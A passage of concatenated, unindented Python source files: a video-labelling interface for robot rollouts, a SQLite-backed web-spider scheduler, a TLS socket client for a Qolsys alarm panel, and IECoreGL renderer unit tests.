self.cur_t = t
start = time.time()
zoomed_frame = zoom(frames[t], self.zoom_factor, order=1)
v.imshow(zoomed_frame)
end = time.time()
render_time = end - start
t += min(len(frames)-t, self.playback_speed)
sleep_time = max(0, self.sleep_time-render_time)
time.sleep(sleep_time)
v.close()
class LabelInterface(object):
def __init__(self):
self.failures = []
self.successes = []
self.fail_files = []
self.suc_files = []
self.labels = []
self.cur_file = 0
self.label_file = 'human_labels_{}'.format(self.cur_file)
self.n = 0
self.renderer = VideoRenderer()
self.user_response_timeout = 1.
self.video_renderer = VideoRenderer()
self.label_dir = 'labels/'
self.stopped = False
if not os.path.exists(self.label_dir):
os.mkdir(self.label_dir)
while os.path.exists(self.label_dir+self.label_file+'.npy'):
self.cur_file += 1
self.label_file = 'human_labels_{}'.format(self.cur_file)
def run(self, dname):
self._find_files(dname)
while not self.stopped:
val = np.random.uniform() < 0.1
self.search_query(t=6, N=10, val=val)
self.write_labels_to_file()
def _find_files(self, dname):
fnames = os.listdir(dname)
for fname in fnames:
if fname.find('suc') >= 0:
self.suc_files.append(dname+fname)
elif fname.find('fail') >= 0:
self.fail_files.append(dname+fname)
def load_from_directory(self, dname):
fnames = os.listdir(dname)
for fname in fnames:
if fname.find('pkl') < 0: continue
self.load_from_file(fname)
def load_from_file(self, fname):
data = np.load(fname, allow_pickle=True)
for t in range(len(data[0])):
x = data[1][t]
if np.all(np.abs(x[-1]-x[0]) < 0.1): continue
if data[-1][t]:
self.successes.append([val[t] for val in data])
else:
self.failures.append([val[t] for val in data])
self.n += 1
def write_labels_to_file(self):
np.save(self.label_dir+self.label_file, self.labels)
def get_example(self, val=False):
val = val and len(self.suc_files)
buf = self.successes if val else self.failures
file_buf = self.fail_files if not val else self.suc_files
while not len(buf) and len(file_buf):
ind = np.random.randint(len(file_buf))
fname = file_buf.pop(ind)
self.load_from_file(fname)
if not len(buf):
self.stopped = True
return None
ind = np.random.randint(len(buf))
example = buf.pop(ind)
return example
def search_query(self, t=10, N=1, max_iters=20, val=False):
print('\nRunning search query...\n')
example = self.get_example(val)
if example is None:
self.stopped = True
return
assert example[-1] == val
hor = len(example[0])
cur_t = 0
invalid_input = False
ts = []
cur_iter = 0
st, et = 0, T
while st >= 0 and et <= hor:
cur_iter += 1
invalid_input = False
res, label_t = self.query_user(example, (st, et))
print('\n\nInterpreted input as: {}\n\n'.format(res))
if res == 'before':
st -= T // 2
et -= T // 2
elif res == 'after':
st += T // 2
et += T // 2
ts.extend([st, cur_t, et-1])
elif res == 'during':
ts.append(st)
break
elif res == 'stop':
self.stopped = True
break
elif res == 'ignore':
break
else:
invalid_input = True
print('Invalid search query', res)
for i, t in enumerate(ts[-N:]):
self.labels.append((res, example[1][t], example[2], example[3], example[-1], len(ts[-N:])-i-1))
def binary_search_query(self, t=10, N=1, max_iters=20, val=False):
print('\nRunning search query...\n')
example = self.get_example(val)
if example is None:
self.stopped = True
return
assert example[-1] == val
hor = len(example[0])
cur_t = hor // 2
invalid_input = False
visited = set()
ts = []
cur_iter = 0
wind = 1 # Consider nearby timesteps visited
a, b = 0, hor
prev_a, prev_b = -1, -1
st, et = max(0, cur_t - t//2), min(cur_t + t//2, hor)
while cur_iter < max_iters and \
(cur_t not in visited or invalid_input) and \
(a != prev_a or b != prev_b):
cur_iter += 1
invalid_input = False
cur_t = max(0, min(cur_t, hor))
visited.update(list(range(cur_t-wind, cur_t+wind+1)))
res, label_t = self.query_user(example, (st, et))
prev_a, prev_b = a, b
print('\n\nInterpreted input as: {}\n\n'.format(res))
if res == 'before':
b = cur_t
elif res == 'after':
a = cur_t
ts.extend([st, cur_t, et-1])
elif res == 'during':
ts.append(st)
break
elif res == 'stop':
self.stopped = True
break
elif res == 'ignore':
break
else:
invalid_input = True
print('Invalid search query', res)
cur_t = (a + b) // 2
st, et = max(0, cur_t - t//2), min(cur_t + t//2, hor)
for i, t in enumerate(ts[-N:]):
self.labels.append((res, example[1][t], example[2], example[3], example[-1], len(ts[-N:])-i-1))
def search_query(self, t=10, N=1, max_iters=20, val=False):
print('\nRunning search query...\n')
example = self.get_example(val)
if example is None:
self.stopped = True
return
assert example[-1] == val
hor = len(example[0])
cur_t = hor // 2
invalid_input = False
visited = set()
ts = []
cur_iter = 0
wind = 1 # Consider nearby timesteps visited
a, b = 0, hor
prev_a, prev_b = -1, -1
st, et = max(0, cur_t - t//2), min(cur_t + t//2, hor)
while cur_iter < max_iters and \
(cur_t not in visited or invalid_input) and \
(a != prev_a or b != prev_b):
cur_iter += 1
invalid_input = False
cur_t = max(0, min(cur_t, hor))
visited.update(list(range(cur_t-wind, cur_t+wind+1)))
res, label_t = self.query_user(example, (st, et))
prev_a, prev_b = a, b
print('\n\nInterpreted input as: {}\n\n'.format(res))
if res == 'before':
b = cur_t
elif res == 'after':
a = cur_t
ts.extend([st, cur_t, et-1])
elif res == 'during':
ts.append(st)
break
elif res == 'stop':
self.stopped = True
break
elif res == 'ignore':
break
else:
invalid_input = True
print('Invalid search query', res)
cur_t = (a + b) // 2
st, et = max(0, cur_t - t//2), min(cur_t + t//2, hor)
for i, t in enumerate(ts[-N:]):
self.labels.append((res, example[1][t], example[2], example[3], example[-1], len(ts[-N:])-i-1))
def query_user(self, example, seg_ts):
choice, ts = self.renderer.interactive_render(example[0][seg_ts[0]:seg_ts[1]])
choice = self.parse_key(choice)
return choice, seg_ts[0] + ts
def parse_key(self, keystroke):
keystroke = keystroke.lstrip().rstrip()
if keystroke.lower() in ['b', '1', 'before', 'left']:
return 'before'
if keystroke.lower() in ['a', '3', 'after', 'right']:
return 'after'
if keystroke.lower() in ['d', '2', 'during', 'space']:
return 'during'
if keystroke.lower() in ['s', '0', 'stop', 'q', 'quit']:
return 'stop'
if keystroke.lower() in ['u', 'i', '', 'unsure', 'ignore']:
return 'ignore'
return 'invalid'
if __name__ == "__main__":
dname = 'rollouts/'
labeller = LabelInterface()
labeller.run(dname)
|
scheduler.py
|
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @author: XYZ
# @file: scheduler.py
# @time: 2020.11.19 16:46
# @desc:
# @references:
# https://charlesleifer.com/blog/going-fast-with-sqlite-and-python/
import os
import time
import queue
import pickle
import sqlite3
import logging
import threading
from multiprocessing import Queue, Process
import nspider.utilities.constant as const
from nspider.core.log import MultiprocessLog
from nspider.settings import Settings
from nspider.core.request import Request
class Scheduler(Process):
def __init__(self, settings: Settings, shared_memory_handler, use_cache=True):
super().__init__()
self.stop_signal = False
self.pause_signal = False
self.fusing_flag = False
self.use_cache = use_cache
self.settings = settings
self.shared_memory_handler = shared_memory_handler
# inner request queue
self.__inner_request_queue = Queue()
# request 是否正在处理
self.__request_in_process_fingerprint = set()
# 已经成功完成的 request 的 fingerprint
self.__request_done_fingerprint = set()
# 失败的请求
self.__request_failed = set()
self.db_path = os.path.join(const.CACHE_DIR, self.settings.DB)
self.__init_db()
def __init_db(self):
if not os.path.exists(self.db_path):
with open(self.db_path, "wb") as f:
pass
elif not os.path.isfile(self.db_path):
raise Exception("Naming conflicts: Can't create db with this name: ".format(self.db_path))
conn = sqlite3.connect(self.db_path)
c = conn.cursor()
c.execute('pragma journal_mode=wal;')
create_request_done_table = "CREATE TABLE if not exists {} ({} TEXT PRIMARY KEY)".format(const.REQUEST_DONE_TABLE, const.COLUMN_NAME_FINGERPRINT)
create_request_buffer_table = "CREATE TABLE if not exists {} (id INTEGER PRIMARY KEY, {} BLOB)".format(const.REQUEST_BUFFER_TABLE, const.COLUMN_NAME_PARAMS)
create_request_failed_table = "CREATE TABLE if not exists {} ({} TEXT PRIMARY KEY, {} BLOB)".format(const.REQUEST_FAILED_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST)
create_request_in_process_table = "CREATE TABLE if not exists {} (id INTEGER PRIMARY KEY, {} TEXT, {} BLOB)".format(const.REQUEST_IN_PROCESS_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST)
create_request_parse_table = "CREATE TABLE if not exists {} (id INTEGER PRIMARY KEY, {} TEXT, {} BLOB)".format(const.REQUEST_PARSE_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST)
create_request_parse_failed_table = "CREATE TABLE if not exists {} ({} TEXT PRIMARY KEY, {} BLOB)".format(const.REQUEST_PARSE_FAILED_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST)
tables = [create_request_in_process_table, create_request_buffer_table, create_request_done_table, create_request_failed_table, create_request_parse_table, create_request_parse_failed_table]
for t in tables:
c.execute(t)
conn.close()
def __load_cache(self):
c = self.conn.cursor()
in_process_requests = c.execute("SELECT * FROM {}".format(const.REQUEST_IN_PROCESS_TABLE))
for r in in_process_requests:
new_request = pickle.loads(r[2])
self.__inner_request_queue.put(new_request)
self.__request_in_process_fingerprint.add(r[1])
self.logger.info("Re-added request which still in processing: {}".format(new_request.url))
requests_parse = c.execute("SELECT * FROM {}".format(const.REQUEST_PARSE_TABLE))
for r in requests_parse:
new_request = pickle.loads(r[2])
self.__add_request(self.c, new_request=new_request)
# pretend parse is done, delete this data now. It will add to request_parse later anyway.
self.parse_done(self.c, r[1])
self.logger.info("Re-added request which still in parsing or failed to parse: {}".format(new_request.url))
requests_done = c.execute("SELECT * FROM {}".format(const.REQUEST_DONE_TABLE))
for r in requests_done:
self.__request_done_fingerprint.add(r[0])
requests_failed = c.execute("SELECT * FROM {}".format(const.REQUEST_FAILED_TABLE))
for r in requests_failed:
self.__request_failed.add(pickle.loads(r[1]))
def run(self):
MultiprocessLog.worker_configurer(self.shared_memory_handler.log_message_queue)
self.logger = logging.getLogger(self.name)
self.conn = sqlite3.connect(self.db_path, check_same_thread=False, isolation_level=None)
self.c = self.conn.cursor()
if self.use_cache:
self.__load_cache()
self.__init_reply_receiver()
self.__init_request_manager()
self.__init_request_transfer()
self.reply_receiver.join()
self.request_manager.join()
self.request_transfer.join()
def __init_reply_receiver(self):
self.reply_receiver = threading.Thread(target=self.__reply_receiver_process)
self.reply_receiver.setDaemon(True)
self.reply_receiver.start()
def __reply_receiver_process(self):
c = self.conn.cursor()
while not self.stop_signal:
if self.pause_signal:
time.sleep(1)
continue
(reply_type, data) = self.shared_memory_handler.get_request_reply()
if reply_type == const.REPLY_REQUEST_DONE:
self.request_done(c, data)
elif reply_type == const.REPLY_REQUEST_FAILED:
self.request_failed(c, data)
elif reply_type == const.REPLY_REQUEST_PARSE:
self.request_parse(c, data)
elif reply_type == const.REPLY_PARSE_DONE:
self.parse_done(c, data)
elif reply_type == const.REPLY_PARSE_FAILED:
self.parse_failed(c, data)
def __init_request_transfer(self):
self.request_transfer = threading.Thread(target=self.__request_transfer_process)
self.request_transfer.setDaemon(True)
self.request_transfer.start()
def __request_transfer_process(self):
while not self.stop_signal:
if self.pause_signal:
time.sleep(1)
continue
request = self.get_inner_request()
self.shared_memory_handler.add_request(new_request=request)
def __init_request_manager(self):
self.request_manager = threading.Thread(target=self.__request_manager_process)
self.request_manager.setDaemon(True)
self.request_manager.start()
def __request_manager_process(self):
c = self.conn.cursor()
while not self.stop_signal:
if self.pause_signal:
time.sleep(1)
continue
try:
(args, kwargs) = self.shared_memory_handler.get_buffer_request(timeout=1)
except queue.Empty:
if self.shared_memory_handler.is_all_task_queue_empty():
res = c.execute("SELECT * FROM {} LIMIT ?".format(const.REQUEST_BUFFER_TABLE), (self.settings.BUFFER_REQUEST_THRESHOLD, ))
if res:
for row in res:
id_ = row[0]
(args, kwargs) = pickle.loads(row[1])
self.__add_request(c, *args, **kwargs)
c.execute("DELETE OR IGNORE FROM {} WHERE id=?".format(const.REQUEST_BUFFER_TABLE), (id_, ))
else:
self.fusing_flag = False
else:
if self.__inner_request_queue.qsize() > self.settings.BUFFER_REQUEST_THRESHOLD:
self.fusing_flag = True
if self.fusing_flag:
self.__add_request_in_buffer(c, (args, kwargs))
else:
res = self.__add_request(c, *args, **kwargs)
if not res:
self.logger.warning("Refuse adding request: {}".format(args[0]))
else:
self.logger.info("Added request: {}".format(args[0]))
self.logger.debug("Added request in buffer queue: {}".format(time.time()))
def __add_request_in_buffer(self, c, params):
c.execute("INSERT INTO {}({}) VALUES (?,)".format(const.REQUEST_BUFFER_TABLE, const.COLUMN_NAME_PARAMS), (pickle.dumps(params),))
@property
def request_done_fingerprint(self):
return self.__request_done_fingerprint
def __add_request(self, c, *args, new_request=None, in_process_filter=True, dupe_filter=True, block=True, timeout=None, **kwargs):
if not new_request:
new_request = Request(*args, **kwargs)
fingerprint = new_request.fingerprint
if in_process_filter:
if fingerprint in self.__request_in_process_fingerprint:
return False
if dupe_filter:
if fingerprint in self.__request_done_fingerprint:
return False
self.__request_in_process_fingerprint.add(fingerprint)
c.execute("INSERT OR IGNORE INTO {}({}, {}) VALUES (?, ?)".format(const.REQUEST_IN_PROCESS_TABLE,
const.COLUMN_NAME_FINGERPRINT,
const.COLUMN_NAME_REQUEST),
(fingerprint, pickle.dumps(new_request)))
self.__inner_request_queue.put(new_request, block, timeout)
return True
def get_inner_request(self, block=True, timeout=None):
return self.__inner_request_queue.get(block, timeout)
def request_done(self, c, fingerprint):
self.__request_done_fingerprint.add(fingerprint)
self.__request_in_process_fingerprint.discard(fingerprint)
c.execute("INSERT OR IGNORE INTO {}({}) VALUES (?)".format(const.REQUEST_DONE_TABLE, const.COLUMN_NAME_FINGERPRINT), (fingerprint, ))
c.execute("DELETE FROM {} WHERE id IN (SELECT id FROM {} WHERE {}=? ORDER BY id LIMIT 1)".format(const.REQUEST_IN_PROCESS_TABLE, const.REQUEST_IN_PROCESS_TABLE, const.COLUMN_NAME_FINGERPRINT), (fingerprint, ))
def request_failed(self, c, request: Request):
self.__request_failed.add(request)
c.execute("INSERT OR IGNORE INTO {}({}, {}) VALUES (?, ?)".format(const.REQUEST_FAILED_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST), (request.fingerprint, pickle.dumps(request), ))
def request_parse(self, c, request: Request):
c.execute("INSERT OR IGNORE INTO {}({}, {}) VALUES (?, ?)".format(const.REQUEST_PARSE_TABLE,
const.COLUMN_NAME_FINGERPRINT,
const.COLUMN_NAME_REQUEST),
(request.fingerprint, pickle.dumps(request),))
def parse_done(self, c, fingerprint):
c.execute("DELETE FROM {} WHERE id IN (SELECT id FROM {} WHERE {}=? ORDER BY id LIMIT 1)".format(const.REQUEST_PARSE_TABLE, const.REQUEST_PARSE_TABLE, const.COLUMN_NAME_FINGERPRINT),
(fingerprint,))
def parse_failed(self, c, request: Request):
c.execute("INSERT OR IGNORE INTO {}({}, {}) VALUES (?, ?)".format(const.REQUEST_PARSE_FAILED_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST), (request.fingerprint, pickle.dumps(request),))
|
qolsys_socket.py
|
import json
import socket
import ssl
import sys
import time
import asyncio
import threading
import appdaemon.plugins.mqtt.mqttapi as mqtt
#
# qolsys socket manager
#
# args
# yep
#
class qolsys:
################################################################################
# Code
def __init__(self, app):
self._sock = socket.socket
self._wrappedSocket = ssl.SSLContext.wrap_socket
self._listening_thread = threading.Thread()
self._listener_callback = callable
self._hostname = ""
self._port = 12345
self._token = ""
self._timeout = 60
self.app = app
self.__listening__ = True
# logging.basicConfig(filename='qolsys_socket.log', level=logging.DEBUG)
def create_socket(self, hostname, port, token, cb: callable, timeout=60):
self._hostname = hostname
self._port = port
self._token = token
self._listener_callback = cb
self._timeout = timeout
try:
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(timeout)
#Set the listener callback at the instance level so we can restart the listener if needed
except socket.error:
self.app.log('Could not create a socket', level="ERROR")
raise
# Wrap SSL
self.app.log("wrapping socket")
self._wrappedSocket = ssl.wrap_socket(self._sock, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1_2)
# Connect to server
try:
#The stupid Qolsys panel requires blocking
# wrappedSocket.setblocking(False)
self.app.log("connecting to socket", level="INFO")
self._wrappedSocket.connect((hostname, port))
self.app.log("Connected wrappedSocket: %s", self._wrappedSocket, level="INFO")
self.app.log("Starting listener thread", level="INFO")
self._start_listener()
self.app.log("started listener", level="INFO")
return True
except socket.error:
self.app.log("Error creating or connecting to socket %s", sys.exc_info(), level="ERROR")
return False
def _start_listener(self):
self.app.log("Starting listener thread", level="INFO")
self._listening_thread = threading.Thread(target=self.listen, args=([self._listener_callback]))
self._listening_thread.start()
self.app.log("started listener thread", level="INFO")
def _reset_socket(self):
self.close_socket()
#self._listening_thread = threading.Thread(target=self.listen, args=([self._listener_callback]))
self.app.log("Creating socket", level="INFO")
self.__listening__ = True
self.create_socket(self._hostname, self._port, self._token, self._listener_callback, self._timeout)
def close_socket(self, timeout=1):
self.app.log("Detatching from wrapped socket", level="WARNING")
self.__listening__ = False
self._wrappedSocket.detach()
self.app.log("Closing socket", level="WARNING")
self._sock.close()
time.sleep(timeout)
def send_to_socket(self, message: json):
self._wrappedSocket.send(b'\n')
self._wrappedSocket.send((json.dumps(message)).encode())
return True
def listen(self, cb: callable):
#listening = True
self.app.log("starting listen", level="INFO")
data = ""
#err = ""
while not (self._wrappedSocket._connected):
self.app.log("not connected yet", level="WARNING")
self.app.log(self._wrappedSocket._connected, level="INFO")
time.sleep(1)
try:
while self._wrappedSocket._connected and self.__listening__:
data = self._wrappedSocket.recv(8192).decode()
if len(data) > 0:
self.app.log("data received from qolsys panel: %s len(data): %s", data, len(data), level="DEBUG")
if is_json(data):
try:
cb(data)
except:
self.app.log("Error calling callback: %s", cb, sys.exc_info(), level="ERROR")
else:
if data != 'ACK\n':
pass
self.app.log("non json data: %s", data, level="DEBUG")
else:
self.app.log("No data received. Bad token? Detatching.", level="ERROR")
self._wrappedSocket.detach()
raise NoDataError
self.app.log("stopped listening on qolsys socket", level="INFO")
except socket.timeout:
self.app.log("socket timeout", level="WARNING")
except NoDataError:
self._reset_socket()
raise NoDataError
except TimeoutError:
self.app.log("qolsys socket TimeoutError: %s", sys.exc_info(), level="ERROR")
self._reset_socket
raise NoDataError
except:
self.app.log("listen failed/stopped: %s", sys.exc_info(), level="ERROR")
def is_json(myjson):
try:
json_object = json.loads(myjson)
if json_object: return True
except:
#if myjson != 'ACK\n':
#self.app.log(("not json: %s", myjson), level="WARNING")
#self.app.log(("Error: %s", sys.exc_info()), level="ERROR")
return False
class NoDataError(Exception):
pass
|
Renderer.py
|
##########################################################################
#
# Copyright (c) 2007-2013, Image Engine Design Inc. All rights reserved.
# Copyright (c) 2011, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import unittest
import os
import os.path
import threading
import math
from IECore import *
import IECore
from IECoreGL import *
init( False )
class TestRenderer( unittest.TestCase ) :
def testOptions( self ) :
os.environ["IECOREGL_TEXTURE_PATHS"] = "textureDefault"
os.environ["IECOREGL_SHADER_PATHS"] = "shaderDefault"
r = Renderer()
self.assertEqual( r.typeName(), "IECoreGL::Renderer" )
self.assertEqual( r.getOption( "searchPath:texture" ), StringData( "textureDefault" ) )
self.assertEqual( r.getOption( "gl:searchPath:texture" ), StringData( "textureDefault" ) )
r.setOption( "searchPath:texture", StringData( "a" ) )
self.assertEqual( r.getOption( "searchPath:texture" ), StringData( "a" ) )
self.assertEqual( r.getOption( "gl:searchPath:texture" ), StringData( "a" ) )
r.setOption( "gl:searchPath:texture", StringData( "b" ) )
self.assertEqual( r.getOption( "searchPath:texture" ), StringData( "b" ) )
self.assertEqual( r.getOption( "gl:searchPath:texture" ), StringData( "b" ) )
self.assertEqual( r.getOption( "searchPath:shader" ), StringData( "shaderDefault" ) )
self.assertEqual( r.getOption( "gl:searchPath:shader" ), StringData( "shaderDefault" ) )
r.setOption( "searchPath:shader", StringData( "s" ) )
self.assertEqual( r.getOption( "searchPath:shader" ), StringData( "s" ) )
self.assertEqual( r.getOption( "gl:searchPath:shader" ), StringData( "s" ) )
r.setOption( "gl:searchPath:shader", StringData( "t" ) )
self.assertEqual( r.getOption( "searchPath:shader" ), StringData( "t" ) )
self.assertEqual( r.getOption( "gl:searchPath:shader" ), StringData( "t" ) )
self.assertEqual( r.getOption( "shutter" ), V2fData( V2f( 0 ) ) )
r.setOption( "shutter", V2fData( V2f( 1, 2 ) ) )
self.assertEqual( r.getOption( "shutter" ), V2fData( V2f( 1, 2 ) ) )
self.assertEqual( r.getOption( "gl:drawCoordinateSystems" ), BoolData( False ) )
r.setOption( "gl:drawCoordinateSystems", BoolData( True ) )
self.assertEqual( r.getOption( "gl:drawCoordinateSystems" ), BoolData( True ) )
def testAttributes( self ) :
deferred = Renderer()
deferred.setOption( "gl:mode", StringData( "deferred" ) )
immediate = Renderer()
immediate.setOption( "gl:mode", StringData( "immediate" ) )
for r in [ deferred, immediate ] :
r.worldBegin()
self.assertEqual( r.getAttribute( "color" ), Color3fData( Color3f( 1 ) ) )
self.assertEqual( r.getAttribute( "opacity" ), Color3fData( Color3f( 1 ) ) )
self.assertEqual( r.getAttribute( "gl:color" ), Color4fData( Color4f( 1 ) ) )
self.assertEqual( r.getAttribute( "gl:blend:color" ), Color4fData( Color4f( 1 ) ) )
self.assertEqual( r.getAttribute( "gl:blend:srcFactor" ), StringData( "srcAlpha" ) )
self.assertEqual( r.getAttribute( "gl:blend:dstFactor" ), StringData( "oneMinusSrcAlpha" ) )
self.assertEqual( r.getAttribute( "gl:blend:equation" ), StringData( "add" ) )
self.assertEqual( r.getAttribute( "gl:shade:transparent" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:primitive:sortForTransparency" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "name" ), StringData( "unnamed" ) )
self.assertEqual( r.getAttribute( "doubleSided" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:smoothing:points" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:smoothing:lines" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:smoothing:polygons" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:procedural:reentrant" ), BoolData( True ) )
if withFreeType() :
self.assertEqual( r.getAttribute( "gl:textPrimitive:type" ), StringData( "mesh" ) )
self.assertEqual( r.getAttribute( "gl:depthTest" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:depthMask" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:alphaTest" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:mode" ), StringData( "always" ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:value" ), FloatData( 0.0 ) )
self.assertEqual( r.getAttribute( "gl:visibility:camera" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:automaticInstancing" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "automaticInstancing" ), BoolData( True ) )
r.setAttribute( "color", Color3fData( Color3f( 0, 1, 2 ) ) )
self.assertEqual( r.getAttribute( "color" ), Color3fData( Color3f( 0, 1, 2 ) ) )
# opacity is an odd one - it's set as a color but as it's averaged internally
# the result you get should be a greyscale value.
r.setAttribute( "opacity", Color3fData( Color3f( 3, 1, 2 ) ) )
self.assertEqual( r.getAttribute( "opacity" ), Color3fData( Color3f( 2 ) ) )
self.assertEqual( r.getAttribute( "gl:color" ), Color4fData( Color4f( 0, 1, 2, 2 ) ) )
r.setAttribute( "gl:color", Color4fData( Color4f( 1, 2, 3, 4 ) ) )
self.assertEqual( r.getAttribute( "gl:color" ), Color4fData( Color4f( 1, 2, 3, 4 ) ) )
r.setAttribute( "gl:blend:color", Color4fData( Color4f( 0, 1, 0, 1 ) ) )
self.assertEqual( r.getAttribute( "gl:blend:color" ), Color4fData( Color4f( 0, 1, 0, 1 ) ) )
r.attributeBegin()
r.setAttribute( "color", Color3fData( Color3f( 0 ) ) )
self.assertEqual( r.getAttribute( "gl:color" ), Color4fData( Color4f( 0, 0, 0, 4 ) ) )
r.attributeEnd()
self.assertEqual( r.getAttribute( "gl:color" ), Color4fData( Color4f( 1, 2, 3, 4 ) ) )
factors = [ "zero", "one", "srcColor", "oneMinusSrcColor", "dstColor", "oneMinusDstColor",
"srcAlpha", "oneMinusSrcAlpha", "dstAlpha", "oneMinusDstAlpha", "dstAlpha", "oneMinusDstAlpha",
"constantColor", "oneMinusConstantColor", "constantAlpha", "oneMinusConstantAlpha" ]
for f in factors :
last = r.getAttribute( "gl:blend:dstFactor" )
r.setAttribute( "gl:blend:srcFactor", StringData( f ) )
self.assertEqual( r.getAttribute( "gl:blend:srcFactor" ), StringData( f ) )
self.assertEqual( r.getAttribute( "gl:blend:dstFactor" ), last )
last = r.getAttribute( "gl:blend:srcFactor" )
r.setAttribute( "gl:blend:dstFactor", StringData( f ) )
self.assertEqual( r.getAttribute( "gl:blend:srcFactor" ), StringData( f ) )
self.assertEqual( r.getAttribute( "gl:blend:dstFactor" ), last )
for e in ["add", "subtract", "reverseSubtract", "min", "max"] :
r.setAttribute( "gl:blend:equation", StringData( e ) )
self.assertEqual( r.getAttribute( "gl:blend:equation" ), StringData( e ) )
r.setAttribute( "name", StringData( "sphere" ) )
self.assertEqual( r.getAttribute( "name" ), StringData( "sphere" ) )
r.setAttribute( "doubleSided", BoolData( False ) )
self.assertEqual( r.getAttribute( "doubleSided" ), BoolData( False ) )
r.setAttribute( "gl:smoothing:points", BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:smoothing:points" ), BoolData( True ) )
r.setAttribute( "gl:smoothing:lines", BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:smoothing:lines" ), BoolData( True ) )
r.setAttribute( "gl:smoothing:polygons", BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:smoothing:polygons" ), BoolData( True ) )
r.setAttribute( "gl:procedural:reentrant", BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:procedural:reentrant" ), BoolData( False ) )
if withFreeType() :
r.setAttribute( "gl:textPrimitive:type", StringData( "sprite" ) )
self.assertEqual( r.getAttribute( "gl:textPrimitive:type" ), StringData( "sprite" ) )
r.setAttribute( "gl:depthTest", BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:depthTest" ), BoolData( False ) )
r.setAttribute( "gl:depthMask", BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:depthMask" ), BoolData( False ) )
r.setAttribute( "gl:alphaTest", BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:alphaTest" ), BoolData( True ) )
alphaTestModes = [ "never", "less", "equal", "lequal", "greater", "notequal", "gequal", "always" ]
value = 0.1
for m in alphaTestModes :
last = r.getAttribute( "gl:alphaTest:value" )
r.setAttribute( "gl:alphaTest:mode", StringData( m ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:mode" ), StringData( m ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:value" ), last )
last = r.getAttribute( "gl:alphaTest:mode" )
r.setAttribute( "gl:alphaTest:value", FloatData( value ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:value" ), FloatData( value ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:mode" ), last )
value += 0.05
r.setAttribute( "gl:visibility:camera", BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:visibility:camera" ), BoolData( False ) )
r.setAttribute( "gl:automaticInstancing", BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:automaticInstancing" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "automaticInstancing" ), BoolData( False ) )
r.setAttribute( "automaticInstancing", BoolData( True ) )
self.assertEqual( r.getAttribute( "automaticInstancing" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:automaticInstancing" ), BoolData( True ) )
r.worldEnd()
def testOtherRendererAttributes( self ) :
"""Attributes destined for other renderers should be silently ignored."""
deferred = Renderer()
deferred.setOption( "gl:mode", StringData( "deferred" ) )
immediate = Renderer()
immediate.setOption( "gl:mode", StringData( "immediate" ) )
with CapturingMessageHandler() as handler :
for r in [ deferred, immediate ] :
r.worldBegin()
r.setAttribute( "ri:visibility:diffuse", IntData( 0 ) )
r.worldEnd()
self.assertEqual( len( handler.messages ), 0 )
def testStackBug( self ) :
# This should produce a yellow sphere in between two red spheres. It does in the DeferredRenderer but
# currently fails in the ImmediateRenderer.
r = Renderer()
r.setOption( "gl:mode", StringData( "immediate" ) )
